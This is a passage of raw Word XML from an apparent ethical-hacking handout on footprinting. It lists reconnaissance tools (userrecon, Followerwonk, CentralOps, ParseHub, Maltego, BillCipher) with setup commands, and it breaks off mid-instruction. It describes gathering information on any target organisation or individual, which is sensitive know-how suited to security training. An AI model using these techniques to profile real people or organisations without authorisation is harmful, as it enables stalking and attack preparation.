            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+x</w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>userrecon.sh</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:t>After changing the permission of userrecon.sh, run the tool by the following command</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>userrecon.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="000304DC">
              <w:t>After entering this command, simply enter the username you wish to search for and the script will take care of the rest.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B268A2" w14:paraId="25A3A517" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="27F6E0F8" w14:textId="77777777" w:rsidR="00B268A2" w:rsidRDefault="00B268A2" w:rsidP="00B74665">
            <w:r>
              <w:t>15.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="45215F70" w14:textId="5B614F4F" w:rsidR="00B268A2" w:rsidRDefault="00B268A2" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Followerwonk</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Web page application</w:t>
            </w:r>
            <w:r w:rsidRPr="000079AE">
              <w:t xml:space="preserve"> www.</w:t>
            </w:r>
            <w:r>
              <w:t>followerwonk.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C572142" w14:textId="77777777" w:rsidR="00B268A2" w:rsidRPr="00A83499" w:rsidRDefault="00B268A2" w:rsidP="00B74665">
            <w:r>
              <w:t>Followerwonk is an online tool that helps you explore and grow your social graph, digging deeper into Twitter analytics; for example, Who are your followers? Where are they located? When do they tweet? This can be used to gather Twitter information about any target organization or individual.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B268A2" w14:paraId="1395F152" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="12011B1B" w14:textId="77777777" w:rsidR="00B268A2" w:rsidRDefault="00B268A2" w:rsidP="00B74665">
            <w:r>
              <w:t>15.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4F7993AE" w14:textId="77777777" w:rsidR="00B268A2" w:rsidRDefault="00B268A2" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06234EE2" w14:textId="735C5345" w:rsidR="00B268A2" w:rsidRDefault="00B268A2" w:rsidP="00B74665">
            <w:r>
              <w:t xml:space="preserve">Simply visit the url, </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://followerwonk.com/analyse</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and enter the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>user name</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="6813285D" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7A57999F" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0DAD69DE" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50C31BED" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="565046BF" w14:textId="3A1EBC66" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665"/>
    <w:p w14:paraId="482E6CA6" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F9D8F6" w14:textId="7AA1A8C0" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CentralOps</w:t>
      </w:r>
      <w:r w:rsidR="00EC362B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00EC362B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> parsehub</w:t>
      </w:r>
      <w:r w:rsidR="00A04B59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00A04B59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Maltego</w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | BillC</w:t>
      </w:r>
      <w:r w:rsidR="00BF18E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pher</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1054"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B74665" w14:paraId="63A0B0C3" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2964CF64" w14:textId="7F79D7FB" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:r>
              <w:t>16.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1B74EDAC" w14:textId="01834273" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CentralOps</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Web page application</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="000079AE">
              <w:t xml:space="preserve"> www.</w:t>
            </w:r>
            <w:r>
              <w:t>centralops.net</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA2601">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FCE97C1" w14:textId="24615224" w:rsidR="00B74665" w:rsidRPr="000079AE" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:r>
              <w:t>CentralOps (centralops.net) is a free online network scanner that investigates domains and IP addresses, DNS records, traceroute, nslookup, whois searches, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="22A6FAE5" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="26AA072D" w14:textId="71F82DE1" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:r>
              <w:t>16.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="63E2171F" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CE4052B" w14:textId="25362A31" w:rsidR="00B74665" w:rsidRPr="009C4612" w:rsidRDefault="00B74665" w:rsidP="00716493">
            <w:r>
              <w:t xml:space="preserve">Simply visit the website </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://centralops.net</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and enter the domain name you wish to investigate further.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B469C" w14:paraId="6005400F" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1CD6F9A0" w14:textId="5DA82F5F" w:rsidR="008B469C" w:rsidRDefault="008B469C" w:rsidP="00716493">
            <w:r>
              <w:t>16.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7E331E67" w14:textId="0AB8FA74" w:rsidR="008B469C" w:rsidRDefault="00EC362B" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>parsehub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A2246DD" w14:textId="3196BF74" w:rsidR="008B469C" w:rsidRDefault="00EC362B" w:rsidP="00716493">
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC362B">
              <w:t>arse</w:t>
            </w:r>
            <w:r>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC362B">
              <w:t xml:space="preserve">ub is a free and powerful web scraping tool. With </w:t>
            </w:r>
            <w:r w:rsidR="00536A2C">
              <w:t>their</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC362B">
              <w:t xml:space="preserve"> advanced web scraper, extracting data is as easy as clicking on the data you need.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Simple visit </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.parsehub.com to download the free tool</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A04B59" w14:paraId="03BAE4A2" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6AB7E821" w14:textId="639472E1" w:rsidR="00A04B59" w:rsidRDefault="00A04B59" w:rsidP="00716493">
            <w:r>
              <w:t>16.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2C511BD9" w14:textId="462A4B34" w:rsidR="00A04B59" w:rsidRDefault="00B23AE6" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidR="00A04B59">
              <w:t>altego</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F4E0750" w14:textId="77777777" w:rsidR="00035CA3" w:rsidRDefault="00A04B59" w:rsidP="00716493">
            <w:r>
              <w:t xml:space="preserve">Maltego </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04B59">
              <w:t>is a footprinting tool used to gather maximum information for the purpose of ethical hacking, computer forensics, and pen testing. It provides a library of transforms to discover data from open sources and visualizes that information in a graph format, suitable for link analysis and data mining.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA60FDA" w14:textId="1B8F60E6" w:rsidR="00A04B59" w:rsidRDefault="00A04B59" w:rsidP="00716493">
            <w:r w:rsidRPr="00A04B59">
              <w:t>Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate, and even making it possible to see hidden connections.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Simply enter: Maltego. And ensure that you have activated/registered a free account</w:t>
            </w:r>
            <w:r w:rsidR="000B2CA7">
              <w:t xml:space="preserve"> (or try: </w:t>
            </w:r>
            <w:r w:rsidR="000B2CA7" w:rsidRPr="000B2CA7">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="000B2CA7" w:rsidRPr="000B2CA7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidR="000B2CA7" w:rsidRPr="000B2CA7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidR="000B2CA7" w:rsidRPr="000B2CA7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>maltego</w:t>
            </w:r>
            <w:r w:rsidR="000B2CA7">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004902E4" w14:paraId="0D065DD5" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6CA7B55F" w14:textId="2EDD0104" w:rsidR="004902E4" w:rsidRDefault="004902E4" w:rsidP="00716493">
            <w:r>
              <w:t>16.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="78E5F34C" w14:textId="5CDE40A8" w:rsidR="004902E4" w:rsidRDefault="004902E4" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>BillC</w:t>
            </w:r>
            <w:r w:rsidR="00BF18E6">
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:t>pher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F9359A9" w14:textId="51053953" w:rsidR="00C8460A" w:rsidRDefault="00C8460A" w:rsidP="00716493">
            <w:r w:rsidRPr="00C8460A">
              <w:t>BillCipher is a Web Reconnaissance tool written in Python. It has so many modules, database interaction, built-in convenience functions, interactive help, and command completion</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604074B7" w14:textId="3BBD131F" w:rsidR="004902E4" w:rsidRDefault="00617E43" w:rsidP="00716493">
            <w:r>
              <w:t>First of all, create a directory for BillCypher to be saved into.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>BillCypher</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CBACE1D" w14:textId="77777777" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>BillCypher</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08323513" w14:textId="31DD59AA" w:rsidR="00BF18E6" w:rsidRDefault="00617E43" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617E43">
              <w:t>Ensure apt, ruby, python3 and python3-pip are installed and up to date:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E43">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ruby python3 python3-pip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B4FE67" w14:textId="77777777" w:rsidR="00617E43" w:rsidRDefault="00BF18E6" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Next, ensure httrack and whatweb are installed:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
